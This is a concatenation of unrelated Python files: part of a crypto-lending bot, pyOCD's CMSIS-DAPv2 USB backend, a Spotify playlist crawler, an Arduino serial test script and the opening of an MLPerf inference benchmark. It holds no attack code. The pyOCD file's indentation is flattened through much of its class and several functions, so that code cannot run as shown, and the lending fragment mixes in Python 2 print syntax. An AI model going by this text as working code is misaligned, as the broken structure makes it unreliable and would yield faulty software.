            MaxToLend.amount_to_lend(total_lended[cur], cur, 0, 0)

    usable_currencies = 0
    global sleep_time  # We need global var to edit sleeptime
    try:
        for cur in lending_balances:
            usable_currencies += lend_cur(cur, total_lended, lending_balances)
    except StopIteration:  # Restart lending if we stop to raise the request limit.
        lend_all()
    set_sleep_time(usable_currencies)
def get_min_daily_rate(cur):
    """Return the minimum acceptable daily rate (Decimal) for *cur*.

    Returns False (sentinel checked by lend_cur) when the coin is disabled
    via a maxactive of 0. Per-coin config overrides the global minimum, and
    the Analysis module may raise the floor further. Alerts about overrides
    are logged only once per coin via the *_alerted dicts.
    """
    cur_min_daily_rate = min_daily_rate
    if cur in coin_cfg:
        if coin_cfg[cur]['maxactive'] == 0:
            if cur not in max_active_alerted:  # Only alert once per coin.
                max_active_alerted[cur] = True
                log.log('maxactive amount for ' + cur + ' set to 0, won\'t lend.')
            return False
        cur_min_daily_rate = Decimal(coin_cfg[cur]['minrate'])
        if cur not in coin_cfg_alerted:  # Only alert once per coin.
            coin_cfg_alerted[cur] = True
            log.log('Using custom mindailyrate ' + str(coin_cfg[cur]['minrate'] * 100) + '% for ' + cur)
    if Analysis:
        recommended_min = Analysis.get_rate_suggestion(cur)
        if cur_min_daily_rate < recommended_min:
            cur_min_daily_rate = recommended_min
    return Decimal(cur_min_daily_rate)
def construct_order_book(active_cur):
    """Fetch the public loan order book for *active_cur*.

    Returns {'rates': [...], 'volumes': [...]} in offer order, or False when
    the API returned nothing. The number of offers requested is tracked per
    currency in ``loanOrdersRequestLimit``.
    """
    # make sure we have a request limit for this currency
    if active_cur not in loanOrdersRequestLimit:
        loanOrdersRequestLimit[active_cur] = defaultLoanOrdersRequestLimit
    loans = api.return_loan_orders(active_cur, loanOrdersRequestLimit[active_cur])
    if len(loans) == 0:
        return False
    offers = loans['offers']
    return {
        'rates': [offer['rate'] for offer in offers],
        'volumes': [offer['amount'] for offer in offers],
    }
def get_gap_rate(active_cur, gap_pct, order_book, cur_total_balance):
    """Walk the order book until *gap_pct* percent of the balance is covered
    and return the rate at that depth.

    Raises StopIteration after raising the per-currency request limit when
    the fetched order book was too shallow (lend_all catches this and
    restarts the pass). Returns max_daily_rate when even the full book is
    too shallow at the maximum request size.

    NOTE(review): with gap_pct == 0 the loop never runs and i stays -1, so
    this returns order_book['rates'][-1] (the deepest rate) — confirm that
    is intended for a zero gap setting.
    """
    gap_expected = gap_pct * cur_total_balance / 100
    gap_sum = 0
    i = -1
    while gap_sum < gap_expected:
        i += 1
        if i == len(order_book['volumes']) and len(order_book['volumes']) == loanOrdersRequestLimit[active_cur]:
            # book exhausted but we can ask for more offers next time
            loanOrdersRequestLimit[active_cur] += defaultLoanOrdersRequestLimit
            log.log(active_cur + ': Not enough offers in response, adjusting request limit to ' + str(
                loanOrdersRequestLimit[active_cur]))
            raise StopIteration
        elif i == len(order_book['volumes']):
            return max_daily_rate
        gap_sum += float(order_book['volumes'][i])
    return Decimal(order_book['rates'][i])
def get_cur_spread(spread, cur_active_bal, active_cur):
    """Return how many orders the balance can actually be split into.

    Starts at the configured *spread* and shrinks it until every order would
    still satisfy the currency's minimum loan size.
    """
    orders = int(spread)  # Checks if active_bal can't be spread that many times, and may go down to 1.
    floor = get_min_loan_size(active_cur)
    while cur_active_bal < orders * floor:
        orders -= 1
    return int(orders)
def construct_orders(cur, cur_active_bal, cur_total_balance):
    """Build the loan offers (amounts and rates) to place for *cur*.

    The available balance is spread over up to ``spread_lend`` orders whose
    rates step linearly from the gap-bottom rate to the gap-top rate. Rates
    above ``max_daily_rate`` are capped, duplicates collapse, and the balance
    is split evenly over the surviving rates (any truncation remainder goes
    into the first order).

    Returns {'amounts': [Decimal, ...], 'rates': [Decimal, ...]}.
    """
    cur_spread = get_cur_spread(spread_lend, cur_active_bal, cur)
    order_book = construct_order_book(cur)
    bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance)
    top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance)
    gap_diff = top_rate - bottom_rate
    if cur_spread == 1:
        rate_step = 0
    else:
        rate_step = gap_diff / (cur_spread - 1)
    order_rates = [bottom_rate + (rate_step * i) for i in range(cur_spread)]
    # Cap every rate at the configured maximum.
    # BUGFIX: the original removed/appended elements while iterating the same
    # list, which skips entries and could leave rates above max_daily_rate.
    order_rates = [min(rate, max_daily_rate) for rate in order_rates]
    # Collapse duplicates (e.g. several capped rates) and sort ascending.
    new_order_rates = sorted(set(order_rates))
    # Split the balance evenly across the remaining rates, truncated to 8 dp.
    new_order_amounts = [Decimal(Data.truncate(cur_active_bal / len(new_order_rates), 8))
                         for _ in new_order_rates]
    remainder = cur_active_bal - sum(new_order_amounts)
    if remainder > 0:  # If truncating causes remainder, add that to first order.
        new_order_amounts[0] += remainder
    return {'amounts': new_order_amounts, 'rates': new_order_rates}
def lend_cur(active_cur, total_lended, lending_balances):
    """Lend the available balance of one currency.

    Returns 1 if the currency could be lent (keeps the sleep timer in active
    mode), 0 otherwise. When the exchange rejects an offer for being below
    its minimum amount, the detected minimum is recorded and the currency is
    retried recursively.
    """
    active_cur_total_balance = Decimal(lending_balances[active_cur])
    if active_cur in total_lended:
        active_cur_total_balance += Decimal(total_lended[active_cur])

    # min daily rate can be changed per currency
    cur_min_daily_rate = get_min_daily_rate(active_cur)

    # log total coin
    log.updateStatusValue(active_cur, "totalCoins", (Decimal(active_cur_total_balance)))
    order_book = construct_order_book(active_cur)
    # cur_min_daily_rate is False when the coin is disabled (maxactive 0)
    if not order_book or len(order_book['rates']) == 0 or not cur_min_daily_rate:
        return 0

    active_bal = MaxToLend.amount_to_lend(active_cur_total_balance, active_cur, Decimal(lending_balances[active_cur]),
                                          Decimal(order_book['rates'][0]))

    if float(active_bal) > get_min_loan_size(active_cur):  # Make sure sleeptimer is set to active if any cur can lend.
        currency_usable = 1
    else:
        return 0  # Return early to end function.

    orders = construct_orders(active_cur, active_bal, active_cur_total_balance)  # Construct all the potential orders
    i = 0
    while i < len(orders['amounts']):  # Iterate through prepped orders and create them if they work
        below_min = Decimal(orders['rates'][i]) < Decimal(cur_min_daily_rate)
        if hide_coins and below_min:
            # hideCoins: place nothing at all rather than reveal our floor
            log.log("Not lending {:s} due to rate below {:.4f}%".format(active_cur,(cur_min_daily_rate * 100)))
            return 0
        elif below_min:
            # clamp the order up to our minimum acceptable rate
            rate = str(cur_min_daily_rate)
        else:
            rate = orders['rates'][i]
        try:
            create_lend_offer(active_cur, orders['amounts'][i], rate)
        except Exception as msg:
            if "Amount must be at least " in str(msg):
                # parse the exchange's reported minimum out of the error text
                import re
                results = re.findall('[-+]?([0-9]*\.[0-9]+|[0-9]+)', str(msg))
                for result in results:
                    if result:
                        min_loan_sizes[active_cur] = float(result)
                        log.log(active_cur + "'s min_loan_size has been increased to the detected min: " + result)
                return lend_cur(active_cur, total_lended, lending_balances)  # Redo cur with new min.
            else:
                raise msg
        i += 1  # Finally, move to next order.
    return currency_usable
def transfer_balances():
    """Move exchange balances of configured currencies to the lending account.

    Only currencies listed in ``transferable_currencies`` are moved, and only
    when their exchange balance is positive. Misconfigured coin names are
    reported. NOTE: Python 2 only (print statement).
    """
    # Transfers all balances on the included list to Lending.
    if len(transferable_currencies) > 0:
        exchange_balances = api.return_balances()  # This grabs only exchange balances.
        for coin in transferable_currencies:
            if coin in exchange_balances and Decimal(
                    exchange_balances[coin]) > 0:
                msg = api.transfer_balance(coin, exchange_balances[coin], 'exchange', 'lending')
                log.log(log.digestApiMsg(msg))
                log.notify(log.digestApiMsg(msg), notify_conf)
            if coin not in exchange_balances:
                print "ERROR: Incorrect coin entered for transferCurrencies: " + coin
|
pyusb_v2_backend.py | # pyOCD debugger
# Copyright (c) 2019-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import six
from time import sleep
import errno
import platform
from .interface import Interface
from .common import (
USB_CLASS_VENDOR_SPECIFIC,
filter_device_by_class,
is_known_cmsis_dap_vid_pid,
check_ep,
)
from ..dap_access_api import DAPAccessIntf
from ... import common
LOG = logging.getLogger(__name__)
# pyusb is an optional dependency; record whether it is usable so the rest of
# the backend can bail out gracefully when it is missing or broken.
try:
    import usb.core
    import usb.util
except Exception:
    # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are no
    # longer swallowed; still broad because libusb loading can raise more
    # than ImportError
    IS_AVAILABLE = False
else:
    IS_AVAILABLE = True
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
    def __init__(self):
        super(PyUSBv2, self).__init__()
        # bulk OUT endpoint (commands to the probe)
        self.ep_out = None
        # bulk IN endpoint (responses from the probe)
        self.ep_in = None
        # optional SWO IN endpoint; None when the device has only two endpoints
        self.ep_swo = None
        # pyusb device handle
        self.dev = None
        # bInterfaceNumber of the claimed CMSIS-DAPv2 interface
        self.intf_number = None
        # serial number used to match the device in open()
        self.serial_number = None
        self.kernel_driver_was_attached = False
        self.closed = True
        # RX thread and its stop event
        self.thread = None
        self.rx_stop_event = None
        # SWO RX thread and its stop event
        self.swo_thread = None
        self.swo_stop_event = None
        # buffers of received packets, consumed by the read side
        self.rcv_data = []
        self.swo_data = []
        # released once per expected response; paces the RX thread
        self.read_sem = threading.Semaphore(0)
        self.packet_size = 512
        self.is_swo_running = False
@property
def has_swo_ep(self):
return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_v2_interface)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.packet_size, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
if self.ep_out:
if (len(data) > 0) and (len(data) < self.packet_size) and (len(data) % self.ep_out.wMaxPacketSize == 0):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
def _match_cmsis_dap_v2_interface(interface):
    """! @brief Returns true for a CMSIS-DAP v2 interface.

    An interface descriptor qualifies as CMSIS-DAPv2 when all of these hold:

    1. Its name string contains "CMSIS-DAP".
    2. bInterfaceClass is 0xff (vendor specific).
    3. bInterfaceSubClass is 0.
    4. It has a bulk-out then a bulk-in endpoint, optionally followed by a
       second bulk-in endpoint (SWO), in exactly that order.
    """
    try:
        name = usb.util.get_string(interface.device, interface.iInterface)

        # The name string identifies CMSIS-DAP in general; the vendor-specific
        # class/subclass pair distinguishes v2 from the HID-based v1.
        if name is None or "CMSIS-DAP" not in name:
            return False
        if interface.bInterfaceClass != USB_CLASS_VENDOR_SPECIFIC:
            return False
        if interface.bInterfaceSubClass != 0:
            return False

        ep_count = interface.bNumEndpoints
        if ep_count not in (2, 3):
            return False

        # Fixed endpoint layout: bulk OUT, bulk IN, optional bulk IN (SWO).
        if not (check_ep(interface, 0, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_BULK)
                and check_ep(interface, 1, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK)):
            return False
        if ep_count == 3 and not check_ep(interface, 2, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
            return False

        # Every requirement met.
        return True
    except (UnicodeDecodeError, IndexError):
        # A corrupted interface name string (seen on certain STLinkV2
        # firmware versions) or a missing endpoint descriptor means we cannot
        # treat this as a usable CMSIS-DAPv2 interface.
        return False
class HasCmsisDapv2Interface(object):
    """! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""

    def __init__(self, serial=None):
        """! @brief Create a new FindDap object with an optional serial number"""
        self._serial = serial

    def __call__(self, dev):
        """! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
        # Check if the device class is a valid one for CMSIS-DAP.
        if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
            return False

        try:
            # Interrogating the configuration can require OS-level access
            # rights, so several failure modes are handled below.
            config = dev.get_active_configuration()
            cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_v2_interface)
        except usb.core.USBError as error:
            # Produce a more helpful error message if we get a permissions error on Linux.
            if error.errno == errno.EACCES and platform.system() == "Linux" \
                    and common.should_show_libusb_device_error((dev.idVendor, dev.idProduct)):
                msg = ("%s while trying to interrogate a USB device "
                       "(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
                       "See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
                       (error, dev.idVendor, dev.idProduct))
                # If we recognize this device as one that should be CMSIS-DAP, we can raise
                # the level of the log message since it's almost certainly a permissions issue.
                if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
                    LOG.warning(msg)
                else:
                    LOG.debug(msg)
            return False
        except (IndexError, NotImplementedError, ValueError, UnicodeDecodeError) as error:
            # Malformed descriptors or backend limitations: treat as no match.
            return False

        if cmsis_dap_interface is None:
            return False

        # When matching by serial number, require an exact match.
        if self._serial is not None:
            if self._serial != dev.serial_number:
                return False
        return True
|
get_tracks.py | #!/usr/bin/env python
import multiprocessing
import sys
import spotipy
from spotipy import util
from spotipy.client import SpotifyException
import pickle
import os
import time
from spotify_tokens import * # stick your CLIENT_ID and CLIENT_SECRET here
# Pickle files: playlist metadata produced by the companion crawler (read by
# main()), and the checkpointed track results written by this script.
# PLAYLIST_PATH was commented out, but main() reads it unconditionally, which
# raised NameError at startup -- restore the constant.
PLAYLIST_PATH = 'playlists.pickle'
TRACKS_PATH = 'tracks.pickle'

# Cooperative pause flag polled by fetch_playlists() workers.
paused = False
def track_yielder(session, owner_id, playlist_id):
    """Yield every track dict of a playlist, following pagination.

    Each page advance is retried up to 3 times on transient Spotify errors,
    sleeping 1s between attempts; a 4xx error (playlist gone or private)
    silently ends the iteration, any other persistent error propagates.

    Fixes two bugs in the previous version:
    - ``raise StopIteration`` inside a generator is a RuntimeError under
      PEP 479 (Python 3.7+); a plain ``return`` ends the generator instead.
    - every page after the first was yielded twice (once by the retry loop
      and again at the top of the outer loop).
    """
    try:
        res = session.user_playlist_tracks(
            owner_id, playlist_id,
            fields='items(track(id, name, artists(name, id), duration_ms)),next')
        while res:
            for item in res['items']:
                yield item['track']
            # Advance to the next page, retrying transient failures.
            tries = 3
            while True:
                try:
                    res = session.next(res)
                    break
                except SpotifyException as e:
                    if 400 <= e.http_status <= 499:
                        return  # playlist no longer accessible
                    tries -= 1
                    if tries == 0:
                        raise
                    time.sleep(1)
            if not res or not res.get('items'):
                return
    except SpotifyException as e:
        if 400 <= e.http_status <= 499:
            return
        raise
def fetch_playlists(session, control_queue, result_queue):
    """Worker loop: drain playlist descriptors from control_queue and push
    (playlist_id, tracks) pairs onto result_queue.

    Spins politely (0.1s naps) while the global `paused` flag is set.
    Returns once the control queue is empty.
    """
    while not control_queue.empty():
        while paused:
            time.sleep(0.1)
        item = control_queue.get()
        fetched = [t for t in track_yielder(session, item['owner'], item['id'])]
        result_queue.put((item['id'], fetched))
def main():
    """Crawl Spotify for the tracks of every playlist in PLAYLIST_PATH,
    checkpointing progress to TRACKS_PATH.

    Repeatedly acquires a fresh auth token, spawns three worker processes to
    fetch the not-yet-seen playlists, and merges their results, until no
    playlists remain. Sleeps periodically to stay under rate limits.

    NOTE(review): the workers are separate processes, so flipping the global
    `paused` flag here does not pause already-running workers (each process
    has its own copy) -- confirm whether that was intended.
    """
    global paused

    # Load playlist metadata; keep only the list of playlist descriptors.
    d = pickle.load(open(PLAYLIST_PATH, 'rb'))
    playlists = list(d['playlists'].values())
    print('Loaded %d playlists' % len(playlists))
    del d

    # Resume from a previous checkpoint when one exists.
    track_count = 0
    if os.path.isfile(TRACKS_PATH):
        tracks, track_ids_in_playlists = pickle.load(open(TRACKS_PATH, 'rb'))
        track_count = sum(track['count'] for track in tracks.values())
        print('Loaded %d playlists with %d tracks (%d unique)' % (len(track_ids_in_playlists), track_count, len(tracks)))
    else:
        tracks = {}                   # track id -> track dict (carries a 'count' of appearances)
        track_ids_in_playlists = {}   # playlist id -> list of track ids

    while True:
        print('Getting Auth')
        token = util.prompt_for_user_token('DOsinga', '',
                                           client_id=CLIENT_ID, client_secret=CLIENT_SECRET,
                                           redirect_uri='http://127.0.0.1:8000/callback')
        session = spotipy.Spotify(auth=token)
        control_queue = multiprocessing.Queue()
        result_queue = multiprocessing.Queue()
        # Queue only the playlists we have not fetched yet.
        for playlist in playlists:
            if not playlist['id'] in track_ids_in_playlists:
                control_queue.put(playlist)
        if control_queue.empty():
            break
        processes = []
        for task_idx in range(3):
            p = multiprocessing.Process(target=fetch_playlists, args=(session, control_queue, result_queue))
            p.start()
            processes.append(p)
        fetched = 0
        missed_count = 0   # consecutive polls that saw an empty result queue
        start = time.time()
        while any(p.is_alive() for p in processes):
            while not result_queue.empty():
                playlist_id, tracks_in_playlist = result_queue.get()
                # Drop null tracks (local files / removed tracks).
                tracks_in_playlist = [t for t in tracks_in_playlist if t]
                if tracks_in_playlist:
                    track_count += len(tracks_in_playlist)
                    for track in tracks_in_playlist:
                        # Deduplicate across playlists; count appearances.
                        track = tracks.setdefault(track['id'], track)
                        track['count'] = track.get('count', 0) + 1
                    track_ids_in_playlists[playlist_id] = [track['id'] for track in tracks_in_playlist]
                    fetched += 1
                    missed_count = 0
                else:
                    missed_count += 1
                    if missed_count == 20:
                        # Probably rate limited: stop workers, cool off, exit.
                        paused = True
                        print('pausing for 30m after %d misses, then exiting' % missed_count)
                        for p in processes:
                            p.terminate()
                        time.sleep(1800)
                        sys.exit()
                if len(track_ids_in_playlists) % 100 == 0:
                    # Progress report plus an atomic-ish checkpoint (rename the
                    # old file aside before rewriting, then remove it).
                    print('playlists: %d (%2.1f%%) - qps: %2.1f - tracks: %d' % (len(track_ids_in_playlists), len(track_ids_in_playlists) * 100 / len(playlists), fetched / (time.time() - start), track_count))
                    if os.path.isfile(TRACKS_PATH):
                        os.rename(TRACKS_PATH, TRACKS_PATH + '.tmp')
                    with open(TRACKS_PATH, 'wb') as fout:
                        pickle.dump((tracks, track_ids_in_playlists), fout, -1)
                    if os.path.isfile(TRACKS_PATH + '.tmp'):
                        os.remove(TRACKS_PATH + '.tmp')
                    if len(track_ids_in_playlists) % 5000 == 0:
                        # Longer breather every 5000 playlists.
                        paused = True
                        print('Taking a break to quiet things down (20m)')
                        time.sleep(1200)
                        print('Break is done.')
                        paused = False
            time.sleep(0.1)
        # Workers for this token finished; persist before fetching a new token.
        with open(TRACKS_PATH, 'wb') as fout:
            pickle.dump((tracks, track_ids_in_playlists), fout, -1)


if __name__ == '__main__':
    main()
|
serial_test.py | #!/usr/bin/env python3
'''
MIT License
Copyright (c) 2017 - Ajay Guleria
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import serial, re
from threading import Thread
from time import sleep
import argparse, logging
import arduino_mode
# Command-line interface: which serial device to talk to, and an optional
# log file for the Arduino's responses.
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', default='/dev/serial0', help="Device to use for serial connection")
parser.add_argument('-l', '--logfile', default=None, help="Log file to use")
args = parser.parse_args()

try:
    ser = serial.Serial(args.device, 115200)
    sleep(1)  # let the port settle before discarding any boot noise
    ser.flushInput()
    #print(ser.name, "opened")
except Exception:
    # Was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
    # raised during the settle sleep; catch only genuine errors.
    print("Failed to open serial port", args.device)
    quit()

if args.logfile is not None:
    # The previous code constructed a logging.Formatter and discarded it, so
    # the intended timestamp format never took effect; pass the format
    # directly to basicConfig instead.
    logging.basicConfig(filename=args.logfile, level=logging.DEBUG,
                        format='%(asctime)s.%(msecs)03d %(message)s', datefmt='%H:%M:%S')

inputAvailable = False  # currently unused; retained for compatibility
entry = ""
bCont = True            # cleared by Ctrl-C handlers to stop both loops
def run_test():
    """Drive a fixed steering/throttle sweep through the Arduino.

    Switches to mode 3, then for every steering value re-sends the steering
    command alongside each throttle value, pausing a second between pairs.
    """
    arduino_mode.set_mode(3)
    steering_sweep = [0, 1000, 1600, 1200, 1700, 1300, 1800, 1400, 1900, 0]
    throttle_sweep = [0, 1200, 0, 1200, 1600, 0, 1700, 1800, 1300, 0, 1300, 0]
    for s in steering_sweep:
        s_cmd = 's=' + str(s) + '\n'
        for t in throttle_sweep:
            t_cmd = 't=' + str(t) + '\n'
            ser.write(s_cmd.encode())
            ser.write(t_cmd.encode())
            #Arduino should continue to send out these pulses
            sleep(1)
def output_function():
    """Reader-thread body: echo every line received from the serial port to
    the configured log file, or to stdout when no log file was given.

    Runs until the global `bCont` flag is cleared (by Ctrl-C here or in the
    main loop); serial errors are reported but do not stop the loop.
    """
    global bCont
    while bCont:
        try:
            line = ser.readline()
            if not len(line):
                continue
            if args.logfile is None:
                print(line)
            else:
                logging.info(line)
            #sleep(.02)
        except serial.SerialException:
            print("Exception happened")
        except KeyboardInterrupt:
            bCont = False
# Background thread that echoes everything the Arduino sends back.
thread = Thread(target = output_function)
thread.start()

# Accept "m=<digits>" (any case, optional whitespace) as a mode command.
pat = re.compile('^\s*m\s*=\s*(\d+)\s*$', re.IGNORECASE)
arduino_mode.start_motors()
# Interactive loop: 'test' runs the canned sweep, 'm=<n>' switches mode,
# anything else is forwarded verbatim to the serial port.
while bCont:
    try:
        entry = input("Print value to send: ");
        if len(entry):
            val = pat.match(entry)
            if entry == 'test':
                run_test()
            elif val is not None:
                arduino_mode.set_mode(int(val.group(1)))
            else:
                ser.write(entry.encode())
            entry = ""
    except KeyboardInterrupt:
        bCont = False

# Shutdown: zero throttle and steering, then stop the motors and reader.
# NOTE(review): unlike run_test(), these commands lack a trailing '\n' --
# confirm the Arduino accepts unterminated commands.
#arduino_mode.set_mode(3)
ser.write('t=0'.encode())
ser.write('s=0'.encode())
arduino_mode.set_mode(0)
arduino_mode.stop_motors()
thread.join()
ser.close()
print('Done')
|
main_vision_test04b_war.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")

# Unit-conversion factors for loadgen latencies/durations.
NANO_SEC = 1e9
MILLI_SEC = 1000

# pylint: disable=missing-docstring

# the datasets we support:
# name -> (dataset class, pre-process fn, post-process fn, dataset kwargs)
SUPPORTED_DATASETS = {
    "imagenet":
        (imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
         {"image_size": [224, 224, 3]}),
    "imagenet_mobilenet":
        (imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
         {"image_size": [224, 224, 3]}),
    "coco-300":
        (coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
         {"image_size": [300, 300, 3]}),
    "coco-300-pt":
        (coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
         {"image_size": [300, 300, 3]}),
    "coco-1200":
        (coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
         {"image_size": [1200, 1200, 3]}),
    "coco-1200-onnx":
        (coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
         {"image_size": [1200, 1200, 3]}),
    "coco-1200-pt":
        (coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
         {"image_size": [1200, 1200, 3],"use_label_map": True}),
    "coco-1200-tf":
        (coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
         {"image_size": [1200, 1200, 3],"use_label_map": False}),
}

# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
    "defaults": {
        "dataset": "imagenet",
        "backend": "tensorflow",
        "cache": 0,
        "max-batchsize": 32,
    },

    # resnet
    "resnet50-tf": {
        "inputs": "input_tensor:0",
        "outputs": "ArgMax:0",
        "dataset": "imagenet",
        "backend": "tensorflow",
        "model-name": "resnet50",
    },
    "resnet50-onnxruntime": {
        "dataset": "imagenet",
        "outputs": "ArgMax:0",
        "backend": "onnxruntime",
        "model-name": "resnet50",
    },

    # mobilenet
    "mobilenet-tf": {
        "inputs": "input:0",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "dataset": "imagenet_mobilenet",
        "backend": "tensorflow",
        "model-name": "mobilenet",
    },
    "mobilenet-onnxruntime": {
        "dataset": "imagenet_mobilenet",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "backend": "onnxruntime",
        "model-name": "mobilenet",
    },

    # ssd-mobilenet
    "ssd-mobilenet-tf": {
        "inputs": "image_tensor:0",
        "outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
        "dataset": "coco-300",
        "backend": "tensorflow",
        "model-name": "ssd-mobilenet",
    },
